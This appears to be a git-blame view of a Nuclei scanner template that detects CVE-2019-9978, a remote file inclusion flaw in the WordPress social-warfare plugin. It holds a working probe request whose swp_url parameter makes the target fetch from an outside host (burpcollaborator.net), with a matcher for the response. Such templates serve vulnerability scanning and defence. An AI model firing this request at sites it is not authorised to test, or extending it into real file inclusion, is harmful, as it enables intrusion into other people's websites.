2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-9978
|
2020-08-12 15:05:52 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress social-warfare RFI
|
2020-08-24 02:08:46 +00:00
|
|
|
author: madrobot & dwisiswant0
|
2020-08-17 06:02:37 +00:00
|
|
|
severity: critical
|
2020-08-12 15:05:52 +00:00
|
|
|
|
2020-08-12 15:12:50 +00:00
|
|
|
# Reference:- https://github.com/mpgn/CVE-2019-9978
|
|
|
|
|
2020-08-12 15:05:52 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-08-24 02:08:46 +00:00
|
|
|
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
|
2020-08-12 15:05:52 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-08-24 02:08:46 +00:00
|
|
|
- "Burp Collabolator Server"
|
2020-08-12 15:12:50 +00:00
|
|
|
part: body
|